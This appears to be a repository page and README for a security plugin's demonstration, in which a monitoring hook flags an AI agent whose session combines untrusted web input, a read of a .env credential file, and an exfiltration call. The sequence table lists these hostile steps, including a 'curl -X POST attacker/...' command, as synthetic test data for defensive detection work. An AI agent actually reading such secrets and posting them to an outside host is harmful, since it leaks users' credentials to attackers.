History

Kjell Tore Guttormsen 583a78c6cc feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs] Companion to `8df5d5c` (which only carried the doc updates — the example directories themselves were left out of staging by mistake). This commit adds the actual example mappes: - examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs, expected-findings.md} - examples/mcp-rug-pull/{README.md, run-rug-pull.mjs, expected-findings.md} Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section with a 4-row table covering malicious-skill-demo, prompt-injection- showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the state-isolation discipline notes. Marketplace root README unchanged since plugin's outward coverage is unchanged ([skip-docs] covers the marketplace-level gate).		2026-05-05 14:45:39 +02:00
..
expected-findings.md	feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]	2026-05-05 14:45:39 +02:00
README.md	feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]	2026-05-05 14:45:39 +02:00
run-trifecta.mjs	feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]	2026-05-05 14:45:39 +02:00

README.md

Lethal Trifecta Walkthrough

WARNING: This is a security demonstration fixture, NOT a real attack. All payloads are synthetic. No external network is contacted, no real file is read, no real command is executed. The script only feeds JSON payloads to one of llm-security's hook scripts.

What this demonstrates

The Rule of Two (Meta, Oct 2025): an agent must never simultaneously hold all three of:

Untrusted input — content the model didn't author (web pages, MCP output, document uploads, prompt injection surface)
Sensitive data access — files like .env, .ssh/, .aws/, credential stores
Exfiltration sink — a path off the box (HTTP POST, scp, paste sites)

Any two are acceptable. All three at once is the lethal trifecta (Simon Willison / Invariant Labs framing) — at that point, prompt injection becomes credential theft.

post-session-guard.mjs (PostToolUse hook on every tool) tracks tool calls in a 20-call sliding window and emits a SECURITY ADVISORY when all three classes appear. This walkthrough shows it firing on a 5-step sequence.

Sequence

#	Tool	Class	Advisory?
1	WebFetch	input_source	no — only one class
2	Read `/path/.env`	data_access (sensitive)	no — only two classes
3	Bash `curl -X POST attacker/...`	exfil_sink	YES — trifecta closes
4	Bash `ls -la`	neutral	no — already warned in window
5	Bash `curl -X POST attacker/...`	exfil_sink	no — suppressed

The advisory at step 3 lists the evidence and recommends remediations (disable HTTP exfil, gate sensitive-path reads, narrow tool surface). Step 4-5 are present to show suppression: post-session-guard writes a warning marker into the state file so the operator isn't spammed by the same trifecta repeating within the window.

How to run

cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs

# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose

Expected: 5 pass, 0 fail and a SECURITY ADVISORY (session-guard) preview after step 3.

Hooks / scanners involved

hooks/scripts/post-session-guard.mjs — the only hook invoked. Configurable via policy.json trifecta.mode (block / warn / off; default warn) or env var LLM_SECURITY_TRIFECTA_MODE.

This example uses mode: warn (default). In block mode the third call's advisory becomes a hard block (exit 2) and the agent action is denied — see docs/security-hardening-guide.md §3 for when to switch.

OWASP / framework mapping

Code	Framework	Why
LLM01	OWASP LLM Top 10 (2025)	Prompt injection lands via the input_source leg
LLM02	OWASP LLM Top 10 (2025)	Sensitive output disclosure (the .env exfil)
ASI01	OWASP Agentic Top 10	Excessive Agency — agent holds all three capabilities
ASI02	OWASP Agentic Top 10	Agent Data Leakage — exfil sink + sensitive read

State isolation

post-session-guard stores per-session state at ${os.tmpdir()}/llm-security-session-${ppid}.jsonl. Because all five hook invocations are spawned by the same run-trifecta.mjs process, they share that script's PID as their parent PID — so the entire walkthrough lives in a single state file. The script deletes the file in a finally block before exiting. Your real session state under /tmp/ is never touched.

Limitations

The walkthrough demonstrates the primary 20-call sliding-window trifecta. It does not exercise the 100-call slow-burn variant (SLOW_BURN_MIN_SPREAD = 50), the MCP-concentrated variant (all three legs from the same MCP server), behavioral drift via Jensen-Shannon divergence, or volume-threshold advisories. Those have their own unit tests under tests/lib/post-session-guard.*.
This is deterministic detection. It does not exercise the block-mode exit-2 path — flip LLM_SECURITY_TRIFECTA_MODE=block and re-run if you want to see the script fail at step 3.